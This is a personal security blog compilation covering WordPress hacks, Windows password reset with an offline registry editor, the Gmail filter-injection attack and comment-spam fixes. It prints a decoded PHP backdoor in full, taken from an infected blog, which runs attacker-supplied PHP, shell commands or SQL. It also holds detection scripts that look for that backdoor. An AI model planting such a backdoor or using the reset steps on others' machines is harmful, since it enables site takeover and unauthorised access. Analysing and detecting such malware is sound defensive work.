My WordPress Blog was Hacked

One of my WordPress blogs was hacked. Here is how you can avoid this:

1. Do not load plugins you do not need
2. Check new plugins before you install them
3. Update WordPress and plugins often

To find the hacked plugins, look at the files' date/time stamps.

Found bfwp on my site; group docs assembly was hacked.
More on elamb.org and thunderstated.com.


Windows Password Recovery: ONTPRE

Offline NT Password & Registry Editor (ONTP&RE)

Did you lock yourself out of your Windows system? Forgot your Windows password? What is the best Windows password recovery method?

The best way is to have a Windows Recovery disc ready.  But this is something you must do BEFORE you get locked out.


There are tools you can use to get into your system, but the first thing you should try is logging in as “Administrator” with no password. “Administrator” is a default account on Windows systems. On Windows 7 it is disabled by default, but if someone has used the account you may be able to use it as a backdoor into the system.

If there is no Administrator account and no Windows Recovery disc, you will have to use a Windows password recovery tool. ONTP&RE is a password recovery tool that allows quick access to Windows systems.

Reset Password: Windows 7

1.  Download ONTP&RE: First, download the Windows password recovery software from pogostick.net: pogostick.net/~pnh/ntpasswd/cd110511.zip

2.  Unzip ONTP&RE: The files are compressed into one archive named cd110511.zip. Unzip it.

3.  Create a CD from the ISO: Set your CD burning software to ‘image to disc’ and burn the image to the CD. Every CD burner program is different, so you will have to figure out how to create a CD from the ISO. Sometimes it's as easy as double-clicking the ISO, but it depends on the software.

4.  Reboot & Insert: You need to make sure your Windows system is able to boot from the CD. Once the disc is done, insert the CD into the CD-ROM drive and reboot your computer.

5.  Boot the Computer from CD: As your computer reboots, keep hitting F2 to get into the BIOS. Select “Boot Options”; some versions of BIOS call this “Boot”, but the idea is the same. Go into the BIOS and make sure CDROM is at the top of the boot order list. This means the computer looks at the CD first before going to the hard drive. Instructions on modifying BIOS settings will be listed on the page.

6.  Boot into ONTP&RE: Once the BIOS boot option is set, save and exit. Your system will boot from your ONTP&RE disc and the software will start running; just follow the steps. “Press enter” to boot into the “Offline NT Password & Registry Editor” CD.

[Screenshot: Offline NT Password & Registry Editor]

7.  Select an Account: It will ask you to select an account. If you hit “Enter” it will automatically choose the [Administrator] account.

*Note: anything in [brackets] is the default value, so if you hit “Enter” it will auto-magically choose that [bracket] value.. it's a Linux thing.. you wouldn't understand.

If you choose the “Administrator” account, you may need to enable the account, since the built-in Administrator account is disabled by default in certain versions of Windows.

8.  Enable the Built-in Administrator Account: The Windows account needs to be enabled. Select 4 (‘Unlock and enable user account’) and hit Enter.

[Screenshot: Windows ONTP&RE user edit menu, enable account]

9.  Clear (blank) the User Password: After selecting 4 (Unlock and enable user account), you will be sent back to the User Edit Menu. If you want to clear the Administrator password (if it has one), hit Enter or type Administrator, then select 1 and hit “Enter” to clear the user password.

10.  Save Changes: Once you have made all the changes you want (enabled the Administrator account and cleared any passwords), you are ready for the next step. Hit ‘!’ and Enter.

[Screenshot: Windows ONTP&RE password save changes]

On the screen it asks ‘What to do?’ Hit q to quit. You will see:

Step FOUR:  Writing back changes

“About to write file(s) back.  Do it ?”

Hit Y and Enter to save the changes.

11.  Last Step: Hit “Ctrl-Alt-Del” to reboot and eject the CD quickly. This will let the system boot into Windows from the hard drive.

You can now login as “Administrator” with NO password.

Once you are in as Administrator you can change passwords of any local accounts in Control Panel | Users.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If you're getting this message: “The server (your server domain, e.g. DOMAIN.COM) at Magic requires a username and password”, then you likely have infected code in your WordPress blog.

[Screenshot: Wordpress Magic Attack]

WordPress user Yokima reported this very slick hack.

FIX ACTION:
The fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information into that “server at Magic” message box. Although updating the WordPress blog definitely fixes the issue, you may have to reload your plugins too, because they may also contain infected code. Doing further research on this matter.

*Similar issue reported by techartistserver: “BLAH.fuzz.com at Fuzz Access requires a username and password.”

This is what the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode, so we decoded the string and found this PHP code:

    // Decoded payload as posted (malware sample, reproduced as found).
    {
        // Helper that runs a shell command through whichever PHP
        // execution function the host has not disabled.
        if (!function_exists('______safeshell'))
        {
            function ______safeshell($komut) {
                @ini_restore("safe_mode");
                @ini_restore("open_basedir");
                $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                if (!empty ($komut)) {
                    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                        //@ ob_start();
                        @ passthru($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    }
                    elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                        //@ ob_start();
                        @ system($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    }
                    elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                        $res = @ shell_exec($komut);
                        echo $res;
                    }
                    elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                        @ exec($komut, $res);
                        $res = join("\n", $res);
                        echo $res, "\n";
                    }
                    elseif (@ is_resource($f = @ popen($komut, "r"))) {
                        //$res = "";
                        while (!@ feof($f)) {
                            //$res .= @ fread($f, 1024);
                            echo(@ fread($f, 1024));
                        }
                        @ pclose($f);
                    }
                    else
                    {
                        $res = {$komut};   // not valid PHP as decoded; left as found
                        echo $res;
                    }
                }
            }
        };

        // Backdoor entry point: a request parameter named after an MD5-like
        // token selects eval of attacker-supplied PHP, a shell command, or a
        // raw SQL query on the WordPress database connection ($wpdb->dbh).
        if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
            echo "\n";
            if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
                eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            }
            else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
                ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            }
            else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
                $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                if (!$result)
                {
                    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                    die();
                }
                else if (is_resource($result))
                {
                    $res = array();
                    while ($row = mysql_fetch_assoc($result))
                    {
                        $res[] = $row;
                    };
                    mysql_free_result($result);
                    echo serialize($res);
                    die();
                }
                else
                {
                    // $wbdb (not $wpdb) is a typo in the decoded original
                    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                    die();
                }
            };
            echo "\n\n";
            die();
        };
    };

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.
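To go with the "look at the date/time stamps" advice and the decoded backdoor above, here is an added example (not from the original post or from RocketWood): a Python scan that walks a WordPress tree, flags PHP files modified after a cutoff, and greps for the backdoor's own indicators (an eval over a decoded blob, the ______safeshell name, and a $_REQUEST['php_<32 hex>'] trigger parameter). The demo builds a constructed plugin directory in a temp folder; its layout and file names are assumptions.

```python
import os
import re
import tempfile
import time

# Signatures taken from the decoded backdoor: eval over a decoded blob, the
# helper's name, and the $_REQUEST['php_<32 hex>'] trigger parameter.
INDICATORS = {
    "eval_decode": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "safeshell": re.compile(r"______safeshell"),
    "magic_param": re.compile(r"_REQUEST\s*\[\s*['\"]php_[0-9a-f]{32}['\"]\s*\]"),
}

def scan_file(path):
    """Return the indicator names matched in one PHP file (empty if clean)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(body)]

def scan_tree(root, modified_since):
    """Map relative path -> hits for .php files that match an indicator or
    whose mtime is newer than modified_since (epoch seconds)."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if os.path.getmtime(path) > modified_since:
                hits.append("recent_mtime")   # the date/time stamp check
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def demo():
    """Build a constructed plugin directory (hypothetical layout) and scan it."""
    root = tempfile.mkdtemp()
    plugin = os.path.join(root, "wp-content", "plugins", "example")
    os.makedirs(plugin)
    clean, infected = os.path.join(plugin, "example.php"), os.path.join(plugin, "footer.php")
    with open(clean, "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    with open(infected, "w") as fh:   # constructed sample mimicking the injected stub
        fh.write("<?php eval(base64_decode('AAAA')); "
                 "if (isset($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {} ?>")
    old = time.time() - 90 * 86400
    os.utime(clean, (old, old))       # clean file last touched 90 days ago
    return scan_tree(root, time.time() - 7 * 86400)   # newer than a week is suspect
```

Run against a real install, replace the demo with scan_tree("/path/to/wordpress", cutoff) and review every flagged file by hand; a plugin update also touches mtimes, so the timestamp hit alone is a prompt, not a verdict.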

Unable to create directory - parent directory writable? WordPress 2.7

I was having trouble uploading images on one of my WordPress 2.7 & 2.8 blogs. It gave me the following error:
Unable to create directory /home/username/server/wp-content/uploads/20XX/MM/ Is it parent directory writable by the server?

After a long time searching, I found this solution from http://www.cyriac.me

Step 1: Log into your admin panel

Step 2: Go to Settings>>Miscellaneous

You will see two options:

Store uploads in this folder
Full URL path to files

Most probably you will see

/home/.boogee/XXXXX/XXXXXXX/wp-content/uploads

in the first field.

Step 3: Edit that to just

wp-content/uploads

Some people were suggesting that you solve the problem by making the folder's permissions 777, meaning anyone can do anything to that particular folder. As a security guy, I knew this was a bad idea (and it also did work for me 🙂 ). I kept searching and ran into that solution.

Worked like a charm! Thanks, Cyriac, for putting the solution on the blog.

More GMAIL Problems

This was news I could not ignore because I really, really like Gmail. These hacks are ridiculous. I hope that Google is getting a handle on this. It looks like the accounts are getting hacked with some sort of script that runs from a site or email while Gmail is open:

According to David Airey & gnucitizen.org:
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forwards them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.
gnucitizen

As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.

You can see the whole story on our temporary blog makeuseof-temporary.blogspot.com/

I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.

Now the thing is, the domain name domainsgames.org is protected by Moniker, and they hide all the contact info for it.

Domain ID:D154519952-LROR
Domain Name:DOMAINSGAME.ORG
Created On:22-Oct-2008 07:35:56 UTC
Last Updated On:08-Nov-2008 12:11:53 UTC
Expiration Date:22-Oct-2009 07:35:56 UTC
Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:MONIKER1571241
.
.
.
.
Name Server:NS3.DOMAINSERVICE.COM
Name Server:NS2.DOMAINSERVICE.COM
Name Server:NS1.DOMAINSERVICE.COM
Name Server:NS4.DOMAINSERVICE.COM

More at MakeUseOf.com

The Google Fix

Analyzing 20,000 MySpace Passwords

In a day when browsers are coming out with anti-phishing tactics, I cannot believe how many people still fall for phishing. It’s all over the news, and most email clients display warnings. So when I got an email from “Admin@MySpace.com” I kind of chuckled.

I have a friend who is constantly getting her MySpace account hacked.  There seem to be lots of security issues in MySpace.


Why Subdomain Hosting is Bad

“A quick look at why offering non-reseller subdomain hosting is a bad idea and can expose your passwords to malicious hostees.”

I’m glad I stumbled across this. I was going to host on WordPress Mu, but now I think I’ll stick with Blogware until I can lock down WPMU. WordPress is a superior product (more intuitive, better SEO design, etc.), but WPMU is just too new. I don’t feel comfortable having a bunch of customers on such a shaky, new system. I will likely host my own set of blogs on it until all the major bugs are worked out.

Dvorak's Blog Spam Fix

Dvorak gets no spam, now he gets no blog spam. 

But my spam problems have just begun:
I started getting nailed with casino, porn and commercial site spam. They trackback promoting Disney trips, penis enlargements or, my favorite, Texas Holdem. I still get a few spam links every few weeks or so. And I'm currently getting and giving traffic to a casino site.. and I haven't figured out how that is happening. I'm sure these bastards are using some kind of software to locate vulnerable (anonymous-accepting) blogs and nuke them. I've had to terminate my anonymous comments and I'm thinking of shutting down my Trackbacks. I also blocked a few repeat offenders. For me, that is unfortunate because the interaction (free comments, links to and from relevant sites of many different opinions) is the coolest thing about blogs. Blog innocence has come and gone overnight.

Apparently, Marc Perkel at ctyme.com has found a way to get rid of all spam, providing you are using Apache and WordPress.

He does it with this code:

    <Location /blog/wp-comments-newpost.php>
        RewriteEngine On
        # Comment posts whose Referer does not come from the blog itself are
        # redirected to an explanation page instead of reaching WordPress.
        RewriteCond %{HTTP_REFERER} !^.*dvorak.org/.*
        RewriteRule ^.* http://www.ctyme.com/comment-spam.html
    </Location>

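The same Referer signal applied after the fact, as an added example that is not part of Dvorak's or Perkel's post: Python that parses Apache combined-format access log lines (a constructed sample, not real traffic) and flags comment-form POSTs whose Referer is missing or not from the blog. It matches the blog host exactly or as a subdomain, which is stricter than the rule's substring match above; since the Referer is client-supplied, the output is a triage signal, not proof.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

BLOG_HOST = "dvorak.org"                        # the blog whose comment form is protected
COMMENT_SCRIPT = "/blog/wp-comments-newpost.php"  # path from the rewrite rule above

def referer_is_local(referer, blog_host=BLOG_HOST):
    """True only when the Referer host is the blog or one of its subdomains;
    an empty or "-" Referer counts as foreign, as the rewrite rule treats it."""
    if referer in ("", "-"):
        return False
    host = (urlsplit(referer).hostname or "").lower()
    return host == blog_host or host.endswith("." + blog_host)

def suspicious_comment_posts(lines):
    """Return (flagged entries, Counter of flagged IPs) for POSTs to the
    comment script whose Referer is missing or points elsewhere."""
    flagged, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != COMMENT_SCRIPT:
            continue
        if not referer_is_local(m["referer"]):
            flagged.append({"ip": m["ip"], "referer": m["referer"], "agent": m["agent"]})
            per_ip[m["ip"]] += 1
    return flagged, per_ip

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2006:10:00:01 -0500] "POST /blog/wp-comments-newpost.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Jan/2006:10:00:05 -0500] "POST /blog/wp-comments-newpost.php HTTP/1.1" 302 0 "http://www.dvorak.org/blog/?p=123" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2006:10:00:09 -0500] "POST /blog/wp-comments-newpost.php HTTP/1.1" 302 0 "http://poker.example.net/spam" "Mozilla/4.0"',
    '192.0.2.4 - - [10/Jan/2006:10:00:12 -0500] "GET /blog/?p=123 HTTP/1.1" 200 5120 "http://example.org/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, counts = suspicious_comment_posts(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(counts.most_common())
```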

Comment Spammers Exploiting Open blogs

I've recently experienced an increase in spam traffic on my blog. It started when I got about 20 comments in one day on one of my least popular articles. I could see that the porn spammer had dug deep into my site and found a seemingly insignificant article to place about 100 links. I deleted them immediately and blocked the IP from whence they came.

The very next day I had fifteen more. I deleted those and blocked that IP. I've been forced to turn off my anonymous comments. One of my favorite things about blogs is that anyone can say anything; they're so refreshingly interactive that they create these close relationships with readers.

Unfortunately, casino, porn and pill spammers also see the power of blogs. They target blogs with anonymous comments and trackbacks. And they use thousands of hacked computers to act as proxies, so that even if you block their IP they've got plenty more ways to get to you.

I've blocked them and I'm still seeing traffic coming from their sites, which tells me that they have linked to my site and my visitors are clicking into their site then coming back to me.

Here is a list of casino spammers retrieved from Netaloid.com:

“Finding our Poker Spammer’s identifying links is easy. Just visit one of his web pages by using one of the thousands of spam links he left on your site. Like poker.terashells.com, for instance. Then click on the links to the casino sites. You’ll see something like (or identical to) this:”


For more on legally stopping casino, porn and other spammers, visit:

http://www.thepetitionsite.com/takeaction/353566831?ltl=1124161500

http://www.theregister.co.uk/2005/01/31/link_spamer_interview/
